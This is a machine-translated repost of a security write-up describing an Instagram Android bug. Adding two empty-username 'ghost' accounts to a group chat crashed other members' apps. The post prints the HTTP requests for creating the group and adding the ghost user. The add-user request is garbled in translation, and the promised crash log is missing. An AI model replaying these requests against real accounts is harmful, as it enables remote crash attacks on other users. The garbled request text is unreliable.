Shulou(Shulou.com)05/31 Report--

This article introduces how to use two zombie accounts to achieve the remote crash of any Instagram account, the content is very detailed, interested friends can refer to, hope to be helpful to you.

Through the research on the security of Instagram, combined with the regular mechanism that Instagram follows when constructing the user name, two zombie accounts in the Instagram back-end database are found. Then, by creating chat group function, using the addition requests of these two zombie accounts, the group members can be attacked by remote crash of Instagram application.

Two "ghost accounts" were found from the analysis of user name structure of Instagram.

In my security research on Instagram, I found that Instagram uses a simple primary key identifier (Primary Key ID,PKID) increment in its back-end database to define the allocation of its user accounts, so I was curious to find out, what were the first user accounts created on the Instagram social network? Later, I found that when PKID is 3 or 4, the corresponding account it points to is Mike Krieger, one of the founders of Instagram.

Primary Keys: primary key, also known as master code, a combination of data columns or attributes in a database table that uniquely and fully identify the stored data object. A data table can have only one primary key, and the value of the primary key cannot be missing, that is, it cannot be null (Null). A primary key is sometimes called a primary key identifier (Primary Key IDs,PKID).

Compared with the global identifier (GUID), Primary Key IDs (PKID) has several advantages from a technical point of view: easy to remember, fast query with incremental changes, less database fragments, following specific patterns, and taking up less storage space.

That's interesting, but what are the first and second Instagram accounts for PKID= 1 or PKID=2? After my research, I found that they are a little unusual, and their corresponding account user names are not reasonably constructed: to be exact, their user name data structure contains an empty string "(" allocates an empty storage space). What is certain is that this allocation setting will definitely lead to other problems. My idea is that these two accounts were created during the initial testing phase of Instagram, but at that time it was just a version of alpha. Why is it still in the back-end database of Instagram that the test account has not been deleted? For now, let's call these two test accounts "Ghost Users" or zombie accounts.

Loophole analysis

To be sure, if the server (Server-Side) mishandles the empty string "", it will certainly lead to some security risks. As a result, I came up with an idea: we can use the server back-end to misparse malformed data to trigger the crash of Instagram applications. Wouldn't it be more interesting to crash other Instagram users remotely?

Through the test and study of the Instagram function, I found that one of the functions can be used to achieve the above-mentioned "remote crash", that is: the creation of groups (temporary chat groups) under Instagram message tags (Messages Tab). The group creation request and API corresponding to this feature are:

/ api/v1/direct_v2/create_group_thread/ vulnerability exploitation

I will use my Samsung Galaxy S8 + test account with Instagram 8.0 to try to create a temporary chat group for two. The request is as follows:

POST / api/v1/direct_v2/create_group_thread/ HTTP/1.1User-Agent: Instagram.... Accept-Language: en-USCookie: urlgen=.... Accept-Encoding: gzip, deflateHost:i.instagram.comX-FB-HTTP-Engine: LigerConnection: closeContent-Length: 353signed_body=d963d5f048924a58712d8bcf7912ac76a7c3c990199c7d59ac25e7990e142f49. {"recipient_users": "[xxxxxxxxxx]", "_ csrftoken": "WBpZmckmENi6eiubd26Osz6SIR3vtowu", "thread_title": "bdbdbdbdbdxb", "_ uid": "12579513534" "_ uuid": "d18570eb-0663-40f4-bcc3-0c48a5031cee"} & ig_sig_key_version=4

Among them, "recipient_users" represents another user I pulled into this temporary group (called Victim here), and xxxxxxxxxx represents his instagram ID. The focus is on the JSON parameter data pair structure. Now, I have created a temporary chat group with another user.

Then, through another API, I drag another user to join the group. Here, I'm going to add what we called "ghost users". The request is as follows:

POST / api/v1/direct_v2/threads/yyyyyyyyyy/add_user/ HTTP/1.1User-Agent: Instagram.... Accept-Language: en-USCookie: urlgen=.... Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip, deflateHost:i.instagram.comX-FB-HTTP-Engine: LigerConnection: closeContent-Length: 109roomcsrftokenfolk Pod4ZKSSLYUYMPs2TxhN5Xkmsv6xUOsOpowered usernames = ["2"] & _ uuid=d18570eb-0663-40f4-bcc3-0c48a5031cee

In the above request, yyyyyyyyyy is the first ID number that represents the group in the Instagram backend response message when the group request is created. In this request, notice that we populate a user_ids field with a value of 2, that is, the aforementioned "ghost user" of PKID=1 or 2.

When we made this request to add a "ghost user", the Instagram application on the phone of another user (Victim) of the group member immediately crashed, and all group members were forced to quit the group.

This is most likely due to the parsing error caused by the empty string ("") in the Instagram backend when parsing the "ghost user" username. Here are the event records I intercepted from the crash event:

Vulnerability impact

Currently, this vulnerability is only valid for testing in the Instagram for Android application environment. Using this Bug vulnerability, we can realize the remote crash attack on any Instagram account by adding normal members to the group, and then adding to the aforementioned "ghost user".

On how to use two zombie accounts to achieve remote crash of any Instagram account to share here, I hope the above content can be of some help to you, can learn more knowledge. If you think the article is good, you can share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.